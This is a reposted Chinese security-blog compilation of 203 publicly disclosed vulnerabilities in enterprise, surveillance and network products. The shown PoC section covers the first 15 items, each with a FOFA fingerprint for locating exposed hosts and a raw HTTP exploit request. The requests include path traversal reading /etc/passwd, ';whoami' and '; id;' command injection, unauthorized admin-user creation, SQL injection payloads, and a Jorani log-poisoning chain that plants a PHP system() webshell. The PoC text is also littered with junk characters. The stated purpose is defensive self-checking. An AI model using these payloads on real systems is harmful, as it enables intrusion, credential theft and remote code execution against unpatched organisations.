Compilation of publicly disclosed Internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Compilation of publicly disclosed Internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article comes from 网络安全新视界, author 网络安全新视界.

Purpose of this post: exploitation of N-day vulnerabilities makes up a large share of attacks in offensive-defensive engagements, and we hope this article is of some help to defenders. Defenders can use its contents to check their own exposure.

Vulnerability sources: this article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few POCs that are too long are replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal rights: if any content infringes on a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To keep the process simple and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, press F12 and search for a keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents
01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor (深信服) NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray (蓝凌) EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray (蓝凌) EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua (大华) DSS itcBulletin SQL injection
18. Dahua (大华) DSS digital surveillance system user_edit.action information disclosure
19. Dahua (大华) DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua (大华) ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua (大华) ICC intelligent IoT integrated management platform random remote code execution
22. Dahua (大华) ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua (大华) ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou (用友) NC 6.5 accept.jsp arbitrary file upload
25. Yonyou (用友) NC registerServlet JNDI remote code execution
26. Yonyou (用友) NC linkVoucher SQL injection
27. Yonyou (用友) NC showcontent SQL injection
28. Yonyou (用友) NC grouptemplet arbitrary file upload
29. Yonyou (用友) NC down/bill SQL injection
30. Yonyou (用友) NC importPml SQL injection
31. Yonyou (用友) NC runStateServlet SQL injection
32. Yonyou (用友) NC complainbilldetail SQL injection
33. Yonyou (用友) NC downTax/download SQL injection
34. Yonyou (用友) NC warningDetailInfo interface SQL injection
35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
36. Yonyou (用友) NC-Cloud soapFormat XXE
37. Yonyou (用友) NC-Cloud IUpdateService XXE
38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
40. Yonyou (用友) U8-Cloud XChangeServlet XXE
41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou (用友) GRP-U8 ufgovbank XXE
46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver (泛微) E-Office json_common.php SQL injection
53. DPtech (迪普) VPN Service arbitrary file upload
54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
55. Chanjet (畅捷通) T+ getdecallusers information disclosure
56. Chanjet (畅捷通) T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon (致远) OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 mobile campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
79. BYTEVALUE (百为) flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity (安恒) 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity (安恒) 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision (海康威视) operations management center session command execution
93. QiAnXin (奇安信) 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin (奇安信) 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS (海洋影视管理系统) dmku SQL injection
201. Founder (方正) omni-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02

+ }4 b, d& Q. x1. StarRocks MPP数据库未授权访问0 Q% w  p) O% ]& N# q( G- r
FOFA :title="StarRocks"' V6 N9 |" j" J% [9 C
GET /mem_tracker HTTP/1.14 M3 G' _; U9 a9 _6 f
Host: URL
. a2 y0 O( g  ^& U3 G
: j* q% m& m0 C1 ~+ |9 l$ S9 b. X! W
2. Casdoor系统static任意文件读取* q+ g# v' t% ?% a4 Y5 D1 Y
FOFA :title="Casdoor"
5 k7 J4 }! F) ^0 W6 d& C& ZGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1; M6 L% [% w( i: n- Q
Host: xx.xx.xx.xx:9999
7 u8 v$ L% C  c7 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36; d4 K4 Z  T  _5 O3 H
Connection: close( \) V+ r9 x+ ?" a) J$ S# c* a, I
Accept: */*. H6 g. e# g& X" w+ k
Accept-Language: en
0 N5 w& }! B+ \; e) g1 a9 @Accept-Encoding: gzip
" c9 i3 X' Q' `$ j4 C: X
: T* t! {/ `4 l9 y
0 H1 S* v' N1 t* |9 Q6 l3. EasyCVR智能边缘网关 userlist 信息泄漏
# A% {8 M! S$ ?8 i& P, VFOFA :title="EasyCVR"
& u& j3 K3 }5 x5 `' L6 w+ BGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
$ n2 ?) a  r7 E7 K% Y; OHost: xx.xx.xx.xx
0 y/ t- ~* U& a; |$ N0 p) ^& r% ?7 B- |+ {7 X
, J6 ?, _7 _5 O
4. EasyCVR视频管理平台存在任意用户添加
$ M8 Q) Z( t% E, F) DFOFA :title="EasyCVR"
% `8 [/ N: e# o! {2 Y6 B* c/ i& n9 e: N3 ^; U8 e
password更改为自己的密码md5
; O# i$ ]. z# g' T) vPOST /api/v1/adduser HTTP/1.1; H! J9 E) [  b0 y3 T( ?1 ]
Host: your-ip
* a  m: J9 j3 }  e* U# iContent-Type: application/x-www-form-urlencoded; charset=UTF-84 Q* \4 ?- n* Y1 [. j5 ]+ N: B

# b+ a8 ?' n9 U$ B6 c* e. b) Nname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1% {5 }5 e/ [! e- c

+ c( U3 m( g2 t; Q4 s" c( L
; \, l- x- v1 P/ a3 `5. NUUO NVR 视频存储管理设备远程命令执行
2 m( f) N  K6 e3 ~% X, [FOFA:title="Network Video Recorder Login"
  F  L0 [: v2 M( P7 Y  c% eGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
" [9 S+ r3 S4 t/ Y; G# Y) C; [; u, sHost: xx.xx.xx.xx
5 c/ V- n' q6 k" g5 g( L2 `" i$ i" w+ F+ e; v& Z& Q
3 |& {, ]% \( }  U, p" H* Y. U* F' s
6. 深信服 NGAF 任意文件读取( [7 d3 F8 N! f/ E( ?
FOFA:title="SANGFOR | NGAF"( H5 A5 ]' V. X$ g4 R' r
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
% a2 M4 x# l  C6 C' i/ wHost:- K5 U; I6 k) d$ T
9 b6 j8 g$ u! V  }9 i0 a; k

+ [+ l" q  U* e  ?( G$ o1 M. i+ b7. 鸿运主动安全监控云平台任意文件下载
/ S  q9 W' J, @* C% [5 e7 BFOFA:body="./open/webApi.html"
" k2 t6 G) g9 |" SGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
( h$ B! _4 b2 z) XHost:+ q& g& y# D# L# V
# R' p& E$ e9 H" I5 e
4 o1 B6 d3 l8 z7 J# r/ B$ n+ {
8. 斐讯 Phicomm 路由器RCE5 a& s* J  [2 l3 l
FOFA:icon_hash="-1344736688"
) {3 G3 A: G* w9 N+ d+ }) F1 p6 `默认账号admin登录后台后,执行操作* l( C7 J4 {1 v" d. l* D; r: M$ j
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
& b- b# b' Q( l0 v$ g* ZHost: x.x.x.x$ T* V  w- O  L% y  I
Cookie: sysauth=第一步登录获取的cookie
0 T9 k2 P2 ^* v& @+ ~, KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz5 S. W' h6 B3 Z6 B
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; p; T) j- s$ b+ A6 s/ R3 `) m; l: U1 e) C
------WebKitFormBoundaryxbgjoytz
4 u% [- q! M9 |Content-Disposition: form-data; name="wifiRebootEnablestatus"/ J+ Y1 z/ Z5 _) `( E, O* u
& I: ]) z- O8 b# e; k; j
%s: @5 V  x/ y) {0 p" [1 D
------WebKitFormBoundaryxbgjoytz& g' g. g6 ^0 d- [- j7 A! Z' o
Content-Disposition: form-data; name="wifiRebootrange", h& F$ v5 h; s  _* k6 J

. f/ l! T0 w. I" \* z0 b* P12:00; id;1 _/ L2 q5 |. c$ a. T
------WebKitFormBoundaryxbgjoytz
( `' h  Z3 I2 C. HContent-Disposition: form-data; name="wifiRebootendrange"
6 a' i. C% m8 \+ N7 W' N4 m
& g7 v6 f( J* v) Y# }%s:
; _" b$ P6 k0 P9 W& U------WebKitFormBoundaryxbgjoytz8 r# U* c0 z& U
Content-Disposition: form-data; name="cururl2"
+ ?# v# ~" h: L7 h! M  c1 Q8 a8 y3 M3 o) l' @, X
7 y: \: d+ o5 w& N7 E
------WebKitFormBoundaryxbgjoytz--0 n3 X0 V5 S4 k. b9 q

$ Y' @+ ~  N8 ]1 q% V
0 ^/ X2 Z4 F+ X8 ~% G0 g9 P9. 稻壳CMS keyword 未授权SQL注入+ H% s7 S. i4 ]8 f' j
FOFA:app="Doccms"" `- [1 F- @6 S8 v% m/ w9 {
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
4 v& v# v. g9 M+ M3 M" lHost: x.x.x.x# a7 _% i8 f% z( t, G% P
. `7 F8 l- f1 w1 m

1 m, e" b& K+ e3 t! d2 Mpayload为下列语句的二次Url编码7 [  m% g" P( g' t  C+ {0 L

1 ~+ U' {6 r( K) B' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
' ^% Z! _' P/ Q! f$ J8 d7 r- Z4 V, Y9 }5 Q% D6 R
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 c7 a5 n8 M- DFOFA:icon_hash="953405444"% C: p6 p: D. ~; A! C1 c

" n  F& |1 e+ ~' P# \文件上传后响应中包含上传文件的路径
5 `! l2 I$ W2 J. m3 DPOST /eis/service/api.aspx?action=saveImg HTTP/1.1. @! [$ T5 N* F9 O* J
Host: x.x.x.x:xx
# g: {, ?2 B- w% l1 L  \3 F3 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
" H1 y  N9 j, x( C* W3 S- X' NContent-Length: 197
# W: U. A7 d) }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
) L% [3 ]" q9 f6 `Accept-Encoding: gzip, deflate' R& f% U$ ~4 m4 H+ O
Accept-Language: zh-CN,zh;q=0.9, P6 U! t2 g  e/ M/ `. d9 ^
Connection: close% h$ G0 l# T* [" E
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
& G/ F4 O$ S4 w5 V
0 Y% J# O4 Z: @6 `. X1 f* B5 u0 z" N------WebKitFormBoundaryxdgaqmqu1 L6 N! W* N9 U+ G) o
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
% g1 A- F7 ]3 B5 b' n9 yContent-Type: text/html
7 s4 A6 ~8 F0 f" V0 R
& e5 R6 N: k7 ~+ _jmnqjfdsupxgfidopeixbgsxbf) @# v5 j& T$ N" U7 X
------WebKitFormBoundaryxdgaqmqu--
% K+ \( V: y: \# `* t
6 P( t# I* z5 r6 q- [
9 g+ m& L7 i6 ?11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 f6 e6 Z  l  t! @& gFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
& w' A; _; K7 Y$ f1 u9 aGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
0 J& p( v. s/ V$ Q$ ?0 C9 yHost: 127.0.0.1
2 `3 j* a0 J" g) M; l2 }Pragma: no-cache
' ?6 s: [1 W. x; O  _Cache-Control: no-cache9 e' M% w" d) ~3 n) \8 o% [
Upgrade-Insecure-Requests: 1
" u- a' `' m7 j2 p6 I; sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
+ u. \* S3 [% F6 R' {4 Y3 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 i# ?2 V8 G* V: o* K, V( R* dAccept-Encoding: gzip, deflate
: `. L' {0 s6 i2 f! y- S+ PAccept-Language: zh-CN,zh;q=0.9,en;q=0.8: |5 j" u! N6 ]9 t
Connection: close
$ o3 S! `# _0 R4 w( ]8 b% c# f

( {/ R2 @( ~% X; j( Q12. Jorani < 1.0.2 远程命令执行
( f+ n+ G$ O6 u; dFOFA:title="Jorani"8 X. G8 S2 o1 f& l6 l3 J1 Q
第一步先拿到cookie
( C8 M5 U1 D4 P* j6 v! x5 cGET /session/login HTTP/1.1* f* y6 D: S( b3 ^" Q, ]
Host: 192.168.190.30, B7 e/ Y" b, n0 ~. p$ ^" g
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
4 p7 f) {! G2 m" r$ i5 oConnection: close
  q& u* A4 _9 M% o  c7 lAccept-Encoding: gzip* Y) S) L! O& {" J8 n" W  p

! _2 B3 L# i! C4 k5 ~  c& C/ Y7 o* q$ d
响应中csrf_cookie_jorani用于后续请求
* C, P4 o6 N6 N" z" {HTTP/1.1 200 OK
- q2 Y. U! D5 Y" S: q" l$ j1 T8 c, fConnection: close+ k- z" N- [' H( |; V
Cache-Control: no-store, no-cache, must-revalidate* g0 V" r; d3 G
Content-Type: text/html; charset=UTF-80 l6 L; w' ?- \1 G6 n3 G
Date: Tue, 24 Oct 2023 09:34:28 GMT
# x2 I) }9 w& xExpires: Thu, 19 Nov 1981 08:52:00 GMT
6 A3 a2 V# v* d) _Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 J3 [/ A  j) o0 d  LPragma: no-cache0 [5 V8 ?. s, j7 q  a! o& ]
Server: Apache/2.4.54 (Debian)
" |1 H: [3 M+ ^& v5 {$ uSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
" i8 N% @0 f7 B8 x1 _( FSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
7 i% T3 d, {. O: G# G5 p7 `% W; u) cVary: Accept-Encoding" l3 ^, n% i! l) m' z

) _1 P, ]# u. u0 ?# d# {; a9 J9 O1 ]( L5 U
POST请求,执行函数并进行base64编码2 W4 X' a6 v" `2 f/ g
POST /session/login HTTP/1.1
% F; w; w6 V0 N8 P+ ~; L* ]Host: 192.168.190.30/ D, n) l4 x7 E4 X) m: q* N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+ `; m' Q2 \; L$ @Connection: close
, q9 A1 e+ Y8 B* V' Y$ o8 `Content-Length: 252$ u( {3 w9 D0 z" k9 R. k* e5 J% r6 F
Content-Type: application/x-www-form-urlencoded
, |0 {! J4 c8 l1 p  H/ S" GCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; u) m8 a2 K% R6 E6 R" V# P  z& V! AAccept-Encoding: gzip
9 c2 B: c5 U6 Z& ]. y, a2 a% G/ m, y2 {3 ?& \5 ]
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
" x5 U& G( Y) ~& B' I- @: G: @
# a3 S6 \* {6 t% x+ E* N
( h+ A/ h6 ?% S' E: [- b
+ a% b& J1 [0 P8 i8 `2 U向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串) Y+ a5 |0 R3 p& M1 |6 D3 s# @
GET /pages/view/log-2023-10-24 HTTP/1.1
/ j1 i* X. Z! W& BHost: 192.168.190.30, y7 [3 l/ [8 n& @. ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36! f% Y# ^7 M6 A+ ?8 O/ i0 C# C
Connection: close/ v1 @3 `9 s% R& `' T
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
) D8 [' y3 V( v9 uK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=& D  J' J9 K! I+ A3 |( Y
X-REQUESTED-WITH: XMLHttpRequest/ V: `3 N4 r8 M( a3 t
Accept-Encoding: gzip/ E! E$ @6 R! C$ S1 t/ U1 n* p" {

; c7 Z5 w7 s: h0 G3 _6 Q2 ^
$ A$ q- Q: G' b9 B; v13. 红帆iOffice ioFileDown任意文件读取0 _" ]" H5 H7 W7 w
FOFA:app="红帆-ioffice"% t* k. E+ Z" l0 `/ w' r2 v
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.13 T/ v$ h- }. m* G
Host: x.x.x.x* D( ^* _9 r' p( n( u  l3 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
5 c  ^; K. K8 Z2 Q& nConnection: close) N) \( d8 I& S' X
Accept: */*% L7 A, f! G) y8 Q
Accept-Encoding: gzip- y' Y9 y, Z! L$ D' ~% h

% D% I9 @8 J$ J% b: l! L; D; y; \+ U" V4 t
14. 华夏ERP(jshERP)敏感信息泄露5 ~+ V; f  q  ~! Q8 p% e
FOFA:body="jshERP-boot"
$ e$ H, Y& W0 r; \: \. L3 x7 }泄露内容包括用户名密码- }7 O7 O' r( a) M
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1& }% f) u' h- L
Host: x.x.x.x
1 \6 b' L& ^( v# cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
9 o$ p) |7 O1 W7 U; TConnection: close
2 r4 v* ^. P# |: B  B) v  ?8 SAccept: */*( Z; t1 \/ C  |$ _2 X# y* _! n
Accept-Language: en- }7 p) x, V" Z
Accept-Encoding: gzip
$ p  c, N9 e: o7 \" y2 t" N" B. L) ~1 N- t( ?) L- w: Q
2 j1 U5 l- m4 [$ @/ ^0 b9 W6 H
15. 华夏ERP getAllList信息泄露
/ C" q( x2 b& I0 TCVE-2024-04908 I0 N( E7 t3 r, K- U/ T9 e
FOFA:body="jshERP-boot"
. u$ }5 ~2 _& h4 I0 H+ |0 N5 m. a泄露内容包括用户名密码& `3 B. J0 D0 |
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.18 B+ i% {/ o/ i% Z- A1 o; `
Host: 192.168.40.130:1001 w$ U2 H9 n( |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36+ P9 F0 U0 c& t/ F9 Y( x
Connection: close4 H2 F1 T6 l/ Y! F2 \3 c0 w* o1 ~
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
/ \0 v' F* N$ x* SAccept-Language: en/ ?" m! U9 l, N$ n+ {  r6 x" D
sec-ch-ua-platform: Windows
9 o8 w9 G4 H& p7 kAccept-Encoding: gzip. E. t5 |5 i. p/ v- ^+ p% z, t
' ~# [& [: B' `. t# a

